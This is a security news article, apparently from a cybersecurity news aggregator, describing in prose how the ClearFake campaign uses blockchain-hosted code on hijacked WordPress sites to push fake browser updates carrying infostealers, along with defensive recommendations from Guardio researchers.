Etherhiding Blockchain Technique Masks Malicious Code in WordPress Sites

The ClearFake campaign uses fake browser updates to lure victims and spread RedLine, Amadey, and Lumma stealers.

A threat actor has been abusing proprietary
blockchain
technology to hide malicious code in a campaign that uses fake browser updates to spread various malware, including the infostealers
RedLine
,
Amadey
, and
Lumma
.
While abuse of blockchain is typically seen in attacks aimed
at stealing cryptocurrency
— as the security technology is best known for protecting these transactions — EtherHiding demonstrates how attackers can leverage it for other types of malicious activity.
Researchers from Guardio have been tracking a campaign dubbed ClearFake over the last two months in which users are misled into downloading malicious fake browser updates from at least 30 highjacked WordPress sites.
The campaign uses a technique called EtherHiding, which presents a novel twist on serving malicious code by using Binance Smart Chain (BSC) contracts from Binance — one of the worlds largest cryptocurrency sites — to host parts of a malicious code chain in what is the next level of Bullet-Proof Hosting, according
to a recent post
by Guardio.
BSC is owned by Binance and focuses on contracts: coded agreements that execute actions automatically when certain conditions are met, Guardio explained in the post. These contracts offer innovative ways to build applications and processes. Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted on-chain without the ability for a takedown.
Attackers are leveraging this in their attack by hosting and serving malicious code in a manner that cant be blocked, making it difficult to stop the activity. This campaign is up and harder than ever to detect and take down, according to the post.
Attackers turned to this tack when their initial method of hosing code on abused Cloudflare Worker hosts was taken down, the researchers noted. Theyve quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain, according to the post.
The attack begins when threat actors use compromised WordPress sites to embed a concealed JavaScript code that is injected into the pages, which retrieves a second-stage payload from an attacker-controlled server. From there, attackers deface websites with a very believable overlay demanding a browser update before the site can be accessed, according to Guardio.
Using this method, the attacker can remotely and instantly modify the infection process and display any message they want, according to the post. It can change tactics, update blocked domains, and switch out detected payloads without re-accessing the WordPress sites.
While blockchain and other Web 3.0 technologies bring innovation, they are also rife for abuse by threat actors that are continuously adapting to leverage their benefits for nefarious activity.
Beyond this specific exploit, blockchain can be misused in myriad ways, from malware propagation stages to data exfiltration of stolen credentials and files, all eluding traditional law enforcement shutdown methods, according to Guardio.
One simple way to block the ClearFake attack would be for Binance to disable any query to addresses already tagged as malicious, or disable the eth_call debug method for unvalidated contracts, according to the post. The researchers did not disclose if they contacted Binance about this potential fix.
Securing WordPress sites — which are
prone to vulnerabilities
and thus ripe for exploitation — also would block the gateway for threats like this to have broad victim impact, according to Guardio.
To this end, the researchers recommend protecting sites by keeping WordPress infrastructure and plugins updated, safeguarding credentials, using robust, periodically-changed passwords, and generally keeping a close eye on whats happening on sites to detect malicious activity.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Etherhiding Blockchain Technique Masks Malicious Code in WordPress Sites